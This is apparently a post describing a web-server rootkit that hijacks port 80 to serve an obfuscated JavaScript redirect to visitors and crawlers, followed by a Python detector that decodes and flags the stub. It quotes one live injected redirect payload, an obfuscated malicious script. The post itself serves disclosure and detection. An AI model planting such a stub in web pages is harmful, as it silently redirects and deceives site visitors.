The rootkit intercepts port 80 and returns the following JS code to clients, forcing them to redirect; search engine bots are redirected too.
It works on many CMSs and blogs because they route unknown non-file requests to /index.php (slug support, SEO, etc.).
It is not visible to rkhunter, chkrootkit or tiger, at least not at first. Other "features" include outgoing probes and open proxying.
The attack vector could be web servers segfaulting during DDoS runs.
This is the JS code (one of endless variations):
<!DOCTYPE html><html><title></title><script>var y=window</script><script>var x={o:'/HHHHRofoZ/',c:1},z=4;function rsu(h){return(x.o).substr(0,x.c)+(x.o).substr(x.c+h)}y.location.assign(rsu(z))</script></html>
I found someone mentioning this code last year (http://ift.tt/1H602hW), without any specific hints or solutions, but at least it is not completely "new".
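A detector for this redirect stub, added here as an example and not part of the original post: it pulls the o/c/z values out of a response body, reproduces the rsu() slicing to recover the real target, and flags every body that carries the stub. The fetch_body helper, the User-Agent strings and the sample bodies are assumptions for illustration.

```python
import re
import urllib.request

# Matches the stub quoted above: x={o:'<path>',c:<keep>},z=<skip> ... .location.assign(rsu(z)).
# rsu(h) keeps the first c chars of o and drops the next h, so the target is o[:c] + o[c+z:].
STUB_RE = re.compile(
    r"x=\{o:'(?P<o>[^']*)',c:(?P<c>\d+)\},z=(?P<z>\d+)"
    r".*?\.location\.assign\(rsu\(z\)\)",
    re.S,
)

def decode_redirect(body):
    """Return the path the stub would send a browser to, or None if the stub is absent."""
    m = STUB_RE.search(body)
    if m is None:
        return None
    o, c, z = m.group("o"), int(m.group("c")), int(m.group("z"))
    return o[:c] + o[c + z:]  # mirrors (x.o).substr(0,x.c)+(x.o).substr(x.c+h) with h=z

def scan_responses(responses):
    """responses: {label: body}. Return {label: decoded target} for injected bodies only."""
    hits = {}
    for label, body in responses.items():
        target = decode_redirect(body)
        if target is not None:
            hits[label] = target
    return hits

def fetch_body(url, user_agent):
    """Fetch url with a chosen User-Agent (hypothetical helper; needs network, not run offline)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")

# Constructed samples: the stub quoted in the post, a re-keyed variant, and a clean page.
SAMPLES = {
    "post-sample": "<!DOCTYPE html><html><title></title><script>var y=window</script>"
                   "<script>var x={o:'/HHHHRofoZ/',c:1},z=4;function rsu(h){return(x.o)"
                   ".substr(0,x.c)+(x.o).substr(x.c+h)}y.location.assign(rsu(z))</script></html>",
    "variant": "<script>var y=window</script><script>var x={o:'/ABofoo/',c:2},z=2;"
               "function rsu(h){return(x.o).substr(0,x.c)+(x.o).substr(x.c+h)}"
               "y.location.assign(rsu(z))</script>",
    "clean": "<!DOCTYPE html><html><body><h1>Welcome</h1></body></html>",
}

if __name__ == "__main__":
    for label, target in scan_responses(SAMPLES).items():
        print(f"{label}: injected redirect to {target}")
    # On a site you administer, compare a crawler view with a browser view, e.g.:
    # scan_responses({"bot": fetch_body(URL, "Googlebot/2.1"), "browser": fetch_body(URL, "Mozilla/5.0")})
```

Because the post says bots are redirected as well, a hit in the crawler view and not in the browser view (or vice versa) is worth noting as a separate finding.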